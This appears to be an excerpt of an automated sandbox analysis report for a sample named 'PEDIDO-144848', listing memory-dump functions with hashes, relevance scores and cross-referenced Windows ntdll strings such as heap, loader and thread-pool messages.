                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-4253913091
                                                        • Opcode ID: a075589ae54c05093fd15fe755168bd4b891bce520d592eab12c34ee85ade968
                                                        • Instruction ID: bb9ac1703b579446f28ae801a822a8a5262f8e04f38a376031c1e97df40989d0
                                                        • Opcode Fuzzy Hash: a075589ae54c05093fd15fe755168bd4b891bce520d592eab12c34ee85ade968
                                                        • Instruction Fuzzy Hash: DAF1AB74B00605DFEB05CF6AC890BAAB7B5FF44348F2481A9E415DB381DB34E981DBA1
                                                        Function 36C29723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                        • API String ID: 3446177414-2283098728
                                                        • Opcode ID: 58ce0d28266f19ad0966da3472fde19945a939774de756e5b8009cd06d100322
                                                        • Instruction ID: 01f40eb579a4f56386e50c5cc18d719d18e55ae90ccd23debcbf27831cba880e
                                                        • Opcode Fuzzy Hash: 58ce0d28266f19ad0966da3472fde19945a939774de756e5b8009cd06d100322
                                                        • Instruction Fuzzy Hash: AB510E75A00B019FEB10EF2BCC84B19F7A1BF84714F18062EE955DB291EB35E851CB92
                                                        Function 36C3C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • Failed to reallocate the system dirs string !, xrefs: 36C780E2
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 36C780F3
                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 36C780E9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 3446177414-1783798831
                                                        • Opcode ID: 3e2f4759ce3dbfaa45105e6ab41cbe651cd6ad26ec353bbb4575d1ae061e952f
                                                        • Instruction ID: 32169b2d1e940d6036f25b1eb6b80b90ddcde802c61838552a56cce0663ebe46
                                                        • Opcode Fuzzy Hash: 3e2f4759ce3dbfaa45105e6ab41cbe651cd6ad26ec353bbb4575d1ae061e952f
                                                        • Instruction Fuzzy Hash: FC41F3B5A15740ABD710DB25CC44F5B7BF9EF85650F10482EFA98EB250EB38D801CB96
                                                        Function 36C843D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 36C84519
                                                        • LdrpCheckRedirection, xrefs: 36C8450F
                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 36C84508
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                        • API String ID: 3446177414-3154609507
                                                        • Opcode ID: 0511e8d357fcda7e4c0bfa996e5e31ca9713547cec1a5522abbaaef9e981fbb4
                                                        • Instruction ID: e23ddf3c7a2c4c05812205e5dbe08601c795c15e9ce22b827aef8df3d40c9077
                                                        • Opcode Fuzzy Hash: 0511e8d357fcda7e4c0bfa996e5e31ca9713547cec1a5522abbaaef9e981fbb4
                                                        • Instruction Fuzzy Hash: FB41D476A047219FDB20CF59C840A9677E5EFC8798F06865DED58DB352E730E800CBA1
                                                        Function 36CDACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: b8671cf081121e85ef1b7d6d6dcd1e2abd51c0a45f7b94aa2c632f5cbf650187
                                                        • Instruction ID: dad156148f4693b2299fe8a656f009cfd2552c06ea4168387b164e600620e5df
                                                        • Opcode Fuzzy Hash: b8671cf081121e85ef1b7d6d6dcd1e2abd51c0a45f7b94aa2c632f5cbf650187
                                                        • Instruction Fuzzy Hash: FBF128B7E006218FCB08CFADC99067EFBF5AF88240B59416ED556DB380D674EA41CB90
                                                        Function 36BF7662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                        • API String ID: 0-3061284088
                                                        • Opcode ID: ee53fc9f28ce3b711d97ade2ca5ecdf677900ab6d1b1a964fc18aea1b82ae2c2
                                                        • Instruction ID: 62c33da0da385b93078cb6e074205ad168de10fe32581e08e7aec4359223639c
                                                        • Opcode Fuzzy Hash: ee53fc9f28ce3b711d97ade2ca5ecdf677900ab6d1b1a964fc18aea1b82ae2c2
                                                        • Instruction Fuzzy Hash: 0D014C37028194AFE309977BDC0CF827BA4DB41774F15809EE5008F5A28E9AD848DE65
                                                        Function 36C00485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 36C00586
                                                        • kLsE, xrefs: 36C005FE
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                        • API String ID: 3446177414-2547482624
                                                        • Opcode ID: ed38de3b4a464b19bb12c595075b70b4978ffe3074e444d141f58ca2090e085d
                                                        • Instruction ID: d7898310bddfc37962f3474f1277705962ba5d959d462e9fb95b25718d26b831
                                                        • Opcode Fuzzy Hash: ed38de3b4a464b19bb12c595075b70b4978ffe3074e444d141f58ca2090e085d
                                                        • Instruction Fuzzy Hash: E6519DB9A007469FEB10DFA6C8406EAB7F8AF44304F11843ED699D7241EB34D545CFAA
                                                        Function 36C0A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                        • API String ID: 0-379654539
                                                        • Opcode ID: 4c908a0d09fbef9e76e11bbad8e97a49c23fe08eeb3d2df8795007c9ae6a2e0b
                                                        • Instruction ID: 064618e4ce657131bda04c5982fa99d56edd5e229961ef2b90a9c0aa16e708d6
                                                        • Opcode Fuzzy Hash: 4c908a0d09fbef9e76e11bbad8e97a49c23fe08eeb3d2df8795007c9ae6a2e0b
                                                        • Instruction Fuzzy Hash: 86C17B785087819FE311CF96C440B5AB7E4BF88748F04496DF895CB252EBB8C949CF9A
                                                        Function 36C38322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 36C3847E
                                                        • LdrpInitializeProcess, xrefs: 36C38342
                                                        • @, xrefs: 36C384B1
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 36C38341
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-1918872054
                                                        • Opcode ID: 30b0de226a3455a32623ee4be751c622f7a471905a49e8e68b43724ac92f932e
                                                        • Instruction ID: 7a7580ee331de7e171ae0a01ab01fe701055ad13c35115117ab2c273bdbf935a
                                                        • Opcode Fuzzy Hash: 30b0de226a3455a32623ee4be751c622f7a471905a49e8e68b43724ac92f932e
                                                        • Instruction Fuzzy Hash: A1916C7150A740AEE722DE61CC50EABBBECFF84784F50492DFA84D6250E738D944CB66
                                                        Function 36C3265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • SXS: %s() passed the empty activation context, xrefs: 36C71FE8
                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 36C720C0
                                                        • .Local, xrefs: 36C327F8
                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 36C71FE3, 36C720BB
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                        • API String ID: 0-1239276146
                                                        • Opcode ID: 8c79b48c5349a9cf51db43b87276836271184a6a8adade7dab514d671d379b30
                                                        • Instruction ID: 63fd2d6409638e90dae782ba9ea6e1bfe8de58c6f4a4ac6025453044bae2a8fe
                                                        • Opcode Fuzzy Hash: 8c79b48c5349a9cf51db43b87276836271184a6a8adade7dab514d671d379b30
                                                        • Instruction Fuzzy Hash: 98A18B75D013299FEB20CF65D884B99B3B1BF58358F2041EAD808EB251D7389E85CF99
                                                        Function 36C063CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 36C60E2F
                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 36C60DEC
                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 36C60E72
                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 36C60EB5
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                        • API String ID: 0-1468400865
                                                        • Opcode ID: 7eba5e6e105dcbddc7657e2e94354d96fd368dcb96a8ab131cb35f07457efacd
                                                        • Instruction ID: 4f7c6d2904215734ec20afbe57a63a6a779515f167b9d5dee6c5bef2cd55d10b
                                                        • Opcode Fuzzy Hash: 7eba5e6e105dcbddc7657e2e94354d96fd368dcb96a8ab131cb35f07457efacd
                                                        • Instruction Fuzzy Hash: D871E1B1908714AFE751DF52CC84B8B7BA8AF857A4F500968F9488B286D734D588CFD2
                                                        Function 36BFF5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                        • API String ID: 0-2586055223
                                                        • Opcode ID: c4167920b5f0942da8d95355654ce30306a71bcdf59a1a2ee023aac5ceaffa56
                                                        • Instruction ID: c8b391dfc0808672c342dc9d01b665e529f5dc067a62b2dde38f6536abb3e6af
                                                        • Opcode Fuzzy Hash: c4167920b5f0942da8d95355654ce30306a71bcdf59a1a2ee023aac5ceaffa56
                                                        • Instruction Fuzzy Hash: 57613576614791AFE311CB65CC44F17B7E8EF88B94F050859FA64CB2A1DB34D804CB6A
                                                        Function 36BF90F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                        • API String ID: 2994545307-1391187441
                                                        • Opcode ID: 42e0ff4a49acbc08d65db73d718a3254c4a412a087933ef8d778b9f9c7d15b7d
                                                        • Instruction ID: 1aa598e40ea67f4485392d8a7a45b6d836747cc8fe1e0a6907ec91d79b92f34c
                                                        • Opcode Fuzzy Hash: 42e0ff4a49acbc08d65db73d718a3254c4a412a087933ef8d778b9f9c7d15b7d
                                                        • Instruction Fuzzy Hash: 56316B36910225FFD701DB56CC84F9ABBB8EF44360F1140A6F500AF2A1DB35DA48CE62
                                                        Function 36C07072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: 51fd52abee1d5847d7b3f214190c36c93a7b0afd3e6066823eb842d51fcc048d
                                                        • Instruction ID: cf9daf0f1d4d69170def67b2e6948dca00ce5e4abf6b51151dbf693e2bb595bf
                                                        • Opcode Fuzzy Hash: 51fd52abee1d5847d7b3f214190c36c93a7b0afd3e6066823eb842d51fcc048d
                                                        • Instruction Fuzzy Hash: F051E134E04615EFEB09DB6AC89879DFBB4BF4431AF208229D502D7690DB74D911CF91
                                                        Function 36C93608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                        • API String ID: 0-1168191160
                                                        • Opcode ID: fdaa3a9b7576ad30b31654547e72d979fb44bedd30ba53ae04766bc3f8ebefe0
                                                        • Instruction ID: 6d515dce59cdbf9110230cc28bd79af09409fb76576dfcb8ab379bc074288efd
                                                        • Opcode Fuzzy Hash: fdaa3a9b7576ad30b31654547e72d979fb44bedd30ba53ae04766bc3f8ebefe0
                                                        • Instruction Fuzzy Hash: 51F17BB5E006288BDB20DB15CC80BD9B3F5AF44744F5481EAEA0DE7241EB319E85CF99
                                                        Function 36C01380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • HEAP: , xrefs: 36C014B6
                                                        • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 36C01648
                                                        • HEAP[%wZ]: , xrefs: 36C01632
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                        • API String ID: 0-3178619729
                                                        • Opcode ID: 7cd864c1c1adccb94d4a666add200a51ca8b1b568b4c8480b7f88d85a3fc2304
                                                        • Instruction ID: c8313cd5993ebc970446f93a23457546962739ea6be110efe3897dea6b96fee4
                                                        • Opcode Fuzzy Hash: 7cd864c1c1adccb94d4a666add200a51ca8b1b568b4c8480b7f88d85a3fc2304
                                                        • Instruction Fuzzy Hash: F7E1FF74A04755AFEB19CFAAC840A7AFBE1EF48308F14885DE596CB641EB34E940CF50
                                                        Function 36C2F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 36C70128
                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 36C700F1
                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 36C700C7
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                        • API String ID: 0-2474120054
                                                        • Opcode ID: 4a65f86f42dccf42fcc741cb37a22d868af755330c225004e0e927fe6634ecef
                                                        • Instruction ID: 8f20bc03b63992e3acaaddc99f6e96ccef6f627d1c7f54f8bfa7c9da644d4682
                                                        • Opcode Fuzzy Hash: 4a65f86f42dccf42fcc741cb37a22d868af755330c225004e0e927fe6634ecef
                                                        • Instruction Fuzzy Hash: BEE1AE74A087459FE711CF29C880B0AB7E1FF44368F204A6DE9A4CB2E1DB74D944CB92
                                                        Function 36C0B5E0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                        • API String ID: 0-1145731471
                                                        • Opcode ID: fcec545b4f4e159ff0fe556b4d779a7630e9cdcbe861566ed858707b1b87a699
                                                        • Instruction ID: 00ab2649266dde6a29e82f6d4b88ada0b83517ac5eeeb53a2020a36254512623
                                                        • Opcode Fuzzy Hash: fcec545b4f4e159ff0fe556b4d779a7630e9cdcbe861566ed858707b1b87a699
                                                        • Instruction Fuzzy Hash: 8DB19875A50B158BEB18CF6AC9A0B9DB3B1BF44798F28452EE815EB390D731E840CF54
                                                        Function 36C8330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                        • API String ID: 0-2391371766
                                                        • Opcode ID: c1759bc792d6a4f590911673ef68e2582f5424829063efa8fe25cfe68b9f53e9
                                                        • Instruction ID: 3504306d75ee81ae1dd89aa20a6946a7d2500243352839eeb16dd4ce2ea4606e
                                                        • Opcode Fuzzy Hash: c1759bc792d6a4f590911673ef68e2582f5424829063efa8fe25cfe68b9f53e9
                                                        • Instruction Fuzzy Hash: A5B19DB1A04741AFE322DF95CC81B5BB7E8FB84758F401929FA48DB250DB75E844CB92
                                                        Function 36C9327E Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                        • API String ID: 0-318774311
                                                        • Opcode ID: 3d7bb2085c431153e118e544137135b29203ddd9b985840d6f1900e99ad5a3b4
                                                        • Instruction ID: dcc6e9f4a47b724ab835171acbb73e1dcfad759c8664633975d842fd105ba1d6
                                                        • Opcode Fuzzy Hash: 3d7bb2085c431153e118e544137135b29203ddd9b985840d6f1900e99ad5a3b4
                                                        • Instruction Fuzzy Hash: FC819D75648750AFE311CB25C844BAAB7E8FF84754F40496DF988DB390DB74D901CBA2
                                                        Function 36C0B360 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                        • API String ID: 0-373624363
                                                        • Opcode ID: 986740d16305bc0726d8123aa46d2bbc92551ca0e8a64114b4aeb78f25bf420b
                                                        • Instruction ID: 682a9d0033f9ad272d007675d1109345d65976506bb4096e97baa4d48c6b071a
                                                        • Opcode Fuzzy Hash: 986740d16305bc0726d8123aa46d2bbc92551ca0e8a64114b4aeb78f25bf420b
                                                        • Instruction Fuzzy Hash: 6E91BA79E04769CBEB11CF96C89079EB7B0EF04368F244199E815AB390D739DA80CF95
                                                        Function 36CDB2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                        Download Yara Rule
                                                        Strings
